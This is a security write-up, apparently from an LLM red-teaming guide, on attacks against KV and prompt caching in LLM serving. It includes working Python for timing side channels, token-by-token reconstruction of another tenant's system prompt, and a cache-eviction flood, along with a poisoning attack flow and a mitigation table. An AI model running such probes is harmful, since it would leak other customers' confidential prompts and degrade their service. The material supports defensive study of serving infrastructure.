KV Cache & Prompt Caching Attacks
How KV cache poisoning, prefix caching exploitation, cache timing side channels, and multi-tenant isolation failures create attack vectors in LLM serving infrastructure.
Overview
Key-Value (KV) caching is a fundamental optimization in transformer-based LLM inference. During autoregressive generation, each new token requires attending to all previous tokens. Without caching, every generation step would recompute the key and value projections for all prior tokens, making total projection work O(n^2) over a sequence of n tokens and prohibitively expensive for long sequences. KV caching stores the computed key-value pairs so each token's projections are calculated only once, leaving O(n) attention work per generated token.
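The asymptotics can be illustrated with a toy operation count (pure bookkeeping, no real model):

```python
def projection_ops(n_tokens: int, cached: bool) -> int:
    """Count K/V projection computations needed to generate n_tokens."""
    if cached:
        # Each token's K/V is projected once and stored for reuse
        return n_tokens
    # Without a cache, every step recomputes K/V for all prior tokens
    return sum(step for step in range(1, n_tokens + 1))

print(projection_ops(4096, cached=False))  # 8390656 (~n^2 / 2)
print(projection_ops(4096, cached=True))   # 4096
```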
Prompt caching extends this optimization across requests. When multiple API calls share a common prefix (such as a system prompt), the KV cache entries for that prefix can be computed once and reused across all requests that share it. This is a critical cost optimization for API providers: a system prompt that appears in millions of requests per day needs to be processed through the model's layers only once. Providers including OpenAI, Anthropic, and Google have deployed various forms of prompt caching to reduce inference costs by 50-90% for requests with shared prefixes.
However, caching introduces shared state into what should be an isolated computation. When two requests share cached KV entries, there is an implicit information channel between them. If the cache is not properly isolated, this channel can be exploited to leak information (timing side channels), influence other users' outputs (cache poisoning), or infer details about the serving infrastructure (cache probing). These attacks target the infrastructure layer rather than the model itself, placing them in a blind spot for safety teams focused on prompt-level and model-level attacks.
The risk is particularly acute in multi-tenant serving environments where multiple customers share GPU resources and, potentially, KV cache memory. Cost pressures incentivize maximal cache sharing; security requires strict isolation. This tension creates a persistent attack surface that grows as providers optimize for efficiency.
How It Works
Understand the KV cache architecture
In a transformer with L layers and H attention heads, the KV cache stores two tensors per layer per head for each token position. For a model with 32 layers, 32 heads, and a head dimension of 128 running in FP16:
```
Cache size per token = 2 (K and V) x 32 layers x 32 heads x 128 dim x 2 bytes
                     = 524,288 bytes ≈ 0.5 MB per token

For a 4096-token context:
Total KV cache = 4096 x 0.5 MB ≈ 2 GB per request
```

This memory pressure drives cache sharing. A single GPU with 80 GB of memory can serve only ~40 concurrent requests at full context length. Prefix caching reduces this by sharing the KV entries for common prefixes across concurrent requests.
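The arithmetic above can be checked with a short helper (the model dimensions are the example's, not any particular model's):

```python
def kv_cache_bytes(n_layers: int, n_heads: int, head_dim: int,
                   n_tokens: int, bytes_per_param: int = 2) -> int:
    """KV cache size: 2 tensors (K and V) per layer per head per token."""
    return 2 * n_layers * n_heads * head_dim * bytes_per_param * n_tokens

per_token = kv_cache_bytes(32, 32, 128, n_tokens=1)      # 524,288 bytes = 0.5 MB
full_context = kv_cache_bytes(32, 32, 128, n_tokens=4096)
print(per_token, full_context // 2**30)                  # 524288 2 (GiB)
```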
Cache timing side channels
When a request hits the prompt cache (its prefix matches cached KV entries), the time-to-first-token (TTFT) is significantly shorter because the prefix does not need to be processed through the model. This timing difference is observable by the API caller.
```python
import time

def measure_ttft(client, system_prompt, user_message):
    """Measure time-to-first-token to detect cache hits."""
    start = time.perf_counter()
    response = client.chat.completions.create(
        model="gpt-4o",
        messages=[
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": user_message},
        ],
        max_tokens=1,
        stream=True,
    )
    for chunk in response:
        if chunk.choices[0].delta.content:
            ttft = time.perf_counter() - start
            break
    return ttft

# Probe whether a specific system prompt is cached
# (i.e., whether another user is using this system prompt)
candidate_prompts = [
    "You are a helpful financial advisor for AcmeCorp...",
    "You are a medical assistant for HealthCo...",
    "You are a legal advisor for LawFirm...",
]

for prompt in candidate_prompts:
    ttft = measure_ttft(client, prompt, "Hello")
    print(f"TTFT: {ttft:.3f}s — {'CACHE HIT' if ttft < 0.5 else 'CACHE MISS'}")
```

A cache hit reveals that another user (or the same provider) is actively using that system prompt, leaking information about the provider's customer base and their system configurations.
Prefix probing for system prompt inference
By systematically testing candidate system prompt prefixes and measuring TTFT, an attacker can reconstruct another user's system prompt character by character (or token by token). This is analogous to a padding oracle attack in cryptography.
```python
def probe_system_prompt_prefix(client, known_prefix, candidate_tokens):
    """
    Given a known prefix of a system prompt, determine the next token
    by testing candidates and measuring cache timing.
    """
    results = []
    for token in candidate_tokens:
        test_prefix = known_prefix + token
        # Measure TTFT multiple times for statistical significance
        timings = [
            measure_ttft(client, test_prefix, "test")
            for _ in range(10)
        ]
        avg_ttft = sum(timings) / len(timings)
        results.append((token, avg_ttft))

    # The candidate that produces the shortest TTFT likely extends
    # the cached prefix — it matches more of the cached KV entries
    results.sort(key=lambda x: x[1])
    most_likely_next = results[0][0]
    return most_likely_next
```

This attack requires that the target system prompt is actively being cached (i.e., the target system is actively receiving requests) and that the attacker can make requests through the same serving infrastructure.
KV cache poisoning in shared environments
In multi-tenant deployments where cache entries are shared without proper isolation, an attacker may be able to inject malicious KV entries that affect other users' requests.
The attack targets the prefix matching mechanism. If the serving infrastructure identifies cache entries by prefix hash rather than by full content verification, hash collisions could cause one user's cached prefix to be served for a different user's request. While hash collisions are rare, targeted collision attacks against weak hash functions are feasible.
More practically, if the cache key includes only the system prompt and not a tenant identifier, then two tenants using the same system prompt share KV cache entries. If one tenant has manipulated the serving infrastructure (e.g., through adversarial batching), the corrupted cache entries affect both tenants.
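The difference between prefix-only and tenant-scoped cache keys can be sketched in a few lines (the key-derivation scheme here is illustrative, not taken from any specific serving framework):

```python
import hashlib

def cache_key_shared(system_prompt: str) -> str:
    """Flawed: key derived from prefix content only."""
    return hashlib.sha256(system_prompt.encode()).hexdigest()

def cache_key_isolated(tenant_id: str, system_prompt: str) -> str:
    """Safer: tenant ID bound into the key, so tenants never share entries."""
    return hashlib.sha256(f"{tenant_id}\x00{system_prompt}".encode()).hexdigest()

prompt = "You are a helpful assistant for AcmeCorp."
# Two tenants with the same prompt collide under prefix-only keying...
assert cache_key_shared(prompt) == cache_key_shared(prompt)
# ...but get distinct entries when the tenant ID is part of the key
assert cache_key_isolated("tenant-a", prompt) != cache_key_isolated("tenant-b", prompt)
```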
Attack flow:

1. Attacker identifies target system prompt (via timing side channel)
2. Attacker sends request with same system prompt + adversarial suffix
3. If the cache key is computed on the shared prefix, the attacker's suffix processing may influence cached entries for the prefix
4. Subsequent requests from the target that hit the cache receive subtly corrupted KV values

Cache eviction attacks for denial of service
An attacker can deliberately evict cached entries belonging to other users by flooding the cache with unique prefixes, forcing cache replacement. This is a denial-of-service attack against the caching infrastructure that degrades performance for targeted users.
```python
import random
import string

def cache_eviction_attack(client, n_requests=10000):
    """
    Flood the prompt cache with unique prefixes to evict
    other users' cached entries.
    """
    for i in range(n_requests):
        # Generate a unique system prompt that won't match any cache entry
        random_suffix = ''.join(
            random.choices(string.ascii_letters, k=100)
        )
        unique_prompt = f"You are assistant #{i}. ID: {random_suffix}"
        client.chat.completions.create(
            model="gpt-4o",
            messages=[
                {"role": "system", "content": unique_prompt},
                {"role": "user", "content": "Hi"},
            ],
            max_tokens=1,
        )
        # Each unique prefix allocates new cache entries,
        # potentially evicting other users' cached prefixes
```
Attack Examples
Example 1: System Prompt Extraction via Cache Timing
A security researcher targets an application built on a commercial LLM API. The application uses a detailed system prompt that includes proprietary instructions, customer data schemas, and tool definitions. By making API calls with candidate system prompt prefixes through the same provider and measuring TTFT, the researcher reconstructs the first 500 tokens of the system prompt over approximately 50,000 API calls. The reconstructed prompt reveals tool definitions, allowed actions, and data schemas that constitute intellectual property and provide attack surface information for further exploitation.
This attack was demonstrated in principle by researchers in 2024 who showed that Anthropic's prompt caching feature, which offers a 90% cost reduction for cached prefixes, creates a measurable timing differential that can be used for prefix inference. The attack's feasibility depends on the provider's cache architecture — specifically, whether cache entries are shared across customers and whether timing information is observable.
Example 2: Multi-Tenant Cache Isolation Failure
In a self-hosted deployment using vLLM or TensorRT-LLM with prefix caching enabled, two customers share the same GPU cluster. Customer A uses a system prompt that includes sensitive access control rules. Customer B discovers that by using the same system prompt prefix and observing generation behavior, they can infer whether the KV cache entries from Customer A's requests are being reused. When cache isolation is not enforced at the tenant level, shared cache entries create an implicit information channel between tenants.
Example 3: Cache-Aware Adversarial Batching
An attacker who has access to batch inference endpoints crafts a batch of requests designed to fill specific KV cache positions with adversarial values. If the serving framework uses PagedAttention (as in vLLM) and does not properly isolate page tables between requests in a batch, the adversarial KV values from one request in the batch may influence attention computation for other requests processed in the same batch. This attack is theoretically possible but has not been demonstrated at scale.
Detection & Mitigation
| Strategy | Implementation | Effectiveness |
|---|---|---|
| Tenant-level cache isolation | Include tenant ID in cache keys; never share KV entries across tenants | High — eliminates cross-tenant information leakage but reduces cache efficiency |
| Timing noise injection | Add random delay to time-to-first-token to mask cache hit/miss signals | Medium — makes timing attacks noisier but does not eliminate them with sufficient samples |
| Cache key integrity verification | Verify full prefix content matches (not just hash) when serving cached KV entries | High — prevents collision-based poisoning but adds latency |
| Rate limiting on unique prefixes | Limit the number of unique system prompts per API key within a time window | Medium — slows cache probing and eviction attacks |
| TTFT normalization | Serve all responses with a minimum TTFT that matches cache-miss latency | High — eliminates timing signal entirely but sacrifices the latency benefit of caching |
| Cache partitioning | Allocate dedicated cache partitions per tenant with guaranteed capacity | High — prevents eviction attacks but requires more memory |
| Monitoring cache access patterns | Alert on anomalous cache access patterns (systematic prefix probing, high unique prefix rates) | Medium — detects attacks in progress but does not prevent initial probing |
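The TTFT-normalization row above can be sketched as a wrapper around first-token generation (the `min_ttft` threshold and wrapper are illustrative assumptions, not any provider's implementation):

```python
import time

def serve_with_normalized_ttft(generate_first_token, min_ttft: float = 0.8):
    """
    Delay the first token until at least min_ttft seconds have elapsed,
    so cache hits and cache misses are indistinguishable to the caller.
    """
    start = time.perf_counter()
    token = generate_first_token()  # fast on cache hit, slow on miss
    elapsed = time.perf_counter() - start
    if elapsed < min_ttft:
        time.sleep(min_ttft - elapsed)  # pad cache hits up to miss latency
    return token

# A near-instant cache hit still takes at least min_ttft to return
t0 = time.perf_counter()
serve_with_normalized_ttft(lambda: "Hello", min_ttft=0.1)
assert time.perf_counter() - t0 >= 0.1
```

The cost of this defense is exactly the latency benefit caching was meant to provide, which is why providers more often settle for timing noise or rate limits.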
Key Considerations
Efficiency and security are directly at odds. The entire value of prompt caching comes from sharing computation across requests. Every security measure that restricts sharing — tenant isolation, cache partitioning, TTFT normalization — reduces the efficiency benefit. Providers must explicitly decide where on the efficiency-security tradeoff they sit and document this for customers.
Side channels are inherent to shared infrastructure. Timing side channels are not a bug in the cache implementation; they are a fundamental property of shared computation. Any shared resource — cache, GPU, network — creates potential side channels. Eliminating all side channels requires dedicated infrastructure per tenant, which many providers cannot afford.
Self-hosted deployments are at higher risk. Organizations running their own LLM serving infrastructure (using frameworks like vLLM, TensorRT-LLM, or text-generation-inference) often enable prefix caching for cost savings without implementing tenant isolation. These deployments may share KV cache across all requests on a GPU, creating a larger attack surface than managed API services which typically implement some degree of isolation.
The PagedAttention paradigm introduces new risks. Modern serving frameworks use PagedAttention to manage KV cache memory efficiently through virtual memory-like page tables. While PagedAttention dramatically improves memory utilization, its memory management model (shared physical pages, copy-on-write) introduces the same classes of vulnerabilities that plagued operating system virtual memory — including confused deputy attacks and TOCTOU (time-of-check-to-time-of-use) races on page table entries.
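The copy-on-write hazard can be shown with a toy page table (a simplified model for illustration, not vLLM's actual block manager):

```python
from dataclasses import dataclass

@dataclass
class PhysicalPage:
    data: list
    refcount: int = 1

class PageTable:
    """Toy KV-cache page table with copy-on-write sharing."""
    def __init__(self):
        self.pages: list[PhysicalPage] = []

    def share(self, page: PhysicalPage) -> None:
        page.refcount += 1  # two sequences now map the same physical page
        self.pages.append(page)

    def write(self, idx: int, token_kv) -> None:
        page = self.pages[idx]
        if page.refcount > 1:
            # Copy-on-write: skipping this check would let one request
            # mutate KV entries still mapped by another request
            page.refcount -= 1
            page = PhysicalPage(data=list(page.data))
            self.pages[idx] = page
        page.data.append(token_kv)

shared = PhysicalPage(data=["kv0"])
victim, attacker = PageTable(), PageTable()
victim.pages.append(shared)
attacker.share(shared)
attacker.write(0, "kv_adv")
assert victim.pages[0].data == ["kv0"]  # victim's page is untouched
```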
References
- Kwon et al., "Efficient Memory Management for Large Language Model Serving with PagedAttention" (SOSP 2023) — PagedAttention KV cache management in vLLM
- Anthropic, "Prompt Caching" (2024) — Prompt caching feature documentation and cache behavior
- Pope et al., "Efficiently Scaling Transformer Inference" (MLSys 2023) — KV cache optimization strategies and memory analysis